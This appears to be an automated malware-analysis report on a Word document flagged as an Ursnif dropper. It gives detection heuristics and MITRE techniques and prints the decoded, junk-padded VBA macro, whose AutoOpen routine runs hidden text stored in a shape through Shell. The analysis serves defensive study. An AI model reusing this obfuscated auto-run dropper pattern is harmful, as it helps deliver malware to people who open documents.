MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample is identified as malicious by ClamAV with the signature 'Doc.Dropper.Ursnif-6864686-0', indicating a known Ursnif variant. The presence of a critical 'Shell()' call within the VBA macros, specifically triggered by the 'AutoOpen' function, strongly suggests the macro is intended to execute arbitrary commands. This functionality is typical for droppers that download and execute further malicious stages.
Heuristics 6
-
ClamAV: Doc.Dropper.Ursnif-6864686-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Ursnif-6864686-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3412 bytes |
SHA-256: 243b68023a1832a04cc334973c6dde46ce7b33ed2a87ac5b1029254f28367f4b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "wjohoty" Function zwyvagaquv() Dim uxqutZXf As Integer Dim nZOCxMfS As Long uxqutZXf = 6438 + 5413 Dim pDAeeV As Integer Dim MpljD As Long pDAeeV = 3969 + 2089 Dim RIhth As Integer Dim rwemiwowy As Long RIhth = 6519 + 6069 Dim bSxkMShz As Integer Dim pGxsV As Long bSxkMShz = 2305 + 2860 Dim XjfzK As Integer Dim qmygali As Long XjfzK = 6881 + 6590 Dim htih As Integer Dim RGxJvC As Long htih = 9303 + 8776 Dim nczHY As Integer Dim KiMNQO As Long nczHY = 5269 + 2935 Dim qfija As Integer Dim dwocan As Long qfija = 4668 + 5466 Dim gfebekito As Integer Dim kgatyqud As Long gfebekito = 9269 + 8141 bjov = "szupocaru" Dim xtyqubolik As Integer Dim pgic As Long xtyqubolik = 6999 + 1620 Dim djehugo As Integer Dim bgiq As Long djehugo = 1631 + 7990 Dim vvanawozy As Integer Dim rtawac As Long vvanawozy = 7213 + 4709 Dim vropefusebu As Integer Dim ckubiwup As Long vropefusebu = 2357 + 9097 Dim gresowu As Integer Dim CdrjUMB As Long gresowu = 9046 + 6312 Dim mfusakabu As Integer Dim WlvNjhN As Long mfusakabu = 3437 + 6494 Dim bpuzozexi As Integer Dim sdajipami As Long bpuzozexi = 1801 + 2179 Dim pDARX As Integer Dim JIlHSk As Long pDARX = 4720 + 2534 Dim WUDSMM As Integer Dim oODqIrs As Long WUDSMM = 4775 + 3528 Set zwyvagaquv = ActiveDocument.Shapes(bjov) End Function Sub AutoOpen() Dim BBqkrlf As Integer Dim qjum As Long BBqkrlf = 5417 + 4007 Dim zfivyxapa As Integer Dim gquhirisy As Long zfivyxapa = 1788 + 8559 Dim EFlZfrao As Integer Dim qhuc As Long EFlZfrao = 6599 + 4483 Dim vkemukezoq As Integer Dim nmxVsYpH As Long vkemukezoq = 7385 + 9310 Dim FlhJu As Integer Dim qloxyc As Long FlhJu = 3537 + 4109 Dim fgiqonimofe As Integer Dim ssucawejeje As Long fgiqonimofe = 8650 + 9316 Set msynirepy = zwyvagaquv Dim gwewetohy As Integer Dim AHkGoQhV As Long gwewetohy = 5921 + 7747 Dim cyyhCEuv As Integer Dim TUedbL As Long cyyhCEuv = 6535 + 5152 Dim wcuduhutywe As Integer Dim RzRFdLiY As Long wcuduhutywe = 6911 + 7826 Interaction.Shell$ _ msynirepy.AlternativeText, vbHide Dim QLQew As Integer Dim wtymo As Long QLQew = 4456 + 7847 Dim rsysutemefa As Integer Dim jqecu As Long rsysutemefa = 5838 + 1792 Dim QjjBof As Integer Dim gXLJPRxC As Long QjjBof = 7786 + 1883 Dim gYtWMi As Integer Dim YfxmXGV As Long gYtWMi = 6712 + 5707 Dim lcXeA As Integer Dim sbaqel As Long lcXeA = 7895 + 8340 Dim nnuxowon As Integer Dim xbapadivuvi As Long nnuxowon = 2233 + 1810 Dim rpAoR As Integer Dim oUDtZyCg As Long rpAoR = 5602 + 6312 Dim zhyxu As Integer Dim ctan As Long zhyxu = 7212 + 8242 Dim rkuruvy As Integer Dim smysisug As Long rkuruvy = 3954 + 1328 Dim afhpipk As Integer Dim hkycy As Long afhpipk = 3887 + 5835 Dim wtapasel As Integer Dim vJhHxdS As Long wtapasel = 6006 + 8804 Dim hxopotu As Integer Dim ZNzpSv As Long hxopotu = 8870 + 2018 End Sub |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.